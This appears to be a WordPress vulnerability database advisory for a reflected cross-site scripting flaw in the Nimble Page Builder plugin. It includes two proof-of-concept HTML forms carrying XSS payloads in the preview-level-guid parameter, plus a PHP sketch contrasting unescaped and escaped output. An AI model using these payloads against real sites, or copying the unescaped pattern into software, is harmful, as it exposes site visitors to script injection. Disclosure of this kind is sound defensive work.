WordPress Plugin Vulnerabilities
Nimble Page Builder < 3.2.2 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the preview-level-guid parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
Proof of Concept
v < 3.1.32

<form action="http://example.com/?customize_messenger_channel" method="POST">
    <input type="text" name="preview-level-guid" value='" xxx><img src onerror=alert(/XSS/)>'>
    <input type="submit" value="Exploit me pls" />
</form>

v < 3.2.2

<form action="http://example.com/?customize_messenger_channel" method="POST">
    <input type="text" name="preview-level-guid" value='" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//'>
    <input type="submit" value="Exploit me pls" />
</form>
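Added example (not the plugin's code): a stand-alone PHP sketch of the missing output escaping, run against the two preview-level-guid values shown above. It assumes the value is reflected into a double-quoted HTML attribute; the function names, the data-guid attribute, the strip_tags variant and the GUID allow-list are hypothetical and say nothing about what the plugin's own fixes changed.

```php
<?php
// Added example: hypothetical template code, not taken from Nimble Page Builder.
// Assumption: the value lands inside a double-quoted HTML attribute.

// Vulnerable pattern: request value concatenated into the attribute unchanged.
function render_vulnerable(string $guid): string {
    return '<div data-guid="' . $guid . '"></div>';
}

// Tag stripping only (hypothetical partial filter): the quote still closes the attribute.
function render_strip_tags(string $guid): string {
    return '<div data-guid="' . strip_tags($guid) . '"></div>';
}

// Escaped for the attribute context. Inside WordPress, esc_attr() does this job.
function render_escaped(string $guid): string {
    return '<div data-guid="' . htmlspecialchars($guid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '"></div>';
}

// Input validation on top of escaping. Assumption: a GUID needs only [A-Za-z0-9_-].
function is_valid_guid(string $guid): bool {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $guid) === 1;
}

// True when anything other than one inert attribute value reached the markup.
function breaks_out(string $html): bool {
    return preg_match('/\A<div data-guid="[^"<>]*"><\/div>\z/', $html) !== 1;
}

// The two parameter values from the Proof of Concept above, plus a constructed benign one.
$samples = [
    'PoC v < 3.1.32' => '" xxx><img src onerror=alert(/XSS/)>',
    'PoC v < 3.2.2'  => '" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//',
    'benign (constructed)' => 'nimble_level_1a2b3c',
];

foreach ($samples as $label => $value) {
    printf(
        "%-22s valid=%-3s raw=%-5s strip_tags=%-5s escaped=%s\n",
        $label,
        is_valid_guid($value) ? 'yes' : 'no',
        breaks_out(render_vulnerable($value)) ? 'BREAK' : 'ok',
        breaks_out(render_strip_tags($value)) ? 'BREAK' : 'ok',
        breaks_out(render_escaped($value)) ? 'BREAK' : 'ok'
    );
}
```

The second value contains no angle brackets, so only quote escaping (or rejecting the value outright) keeps it inside the attribute.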
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)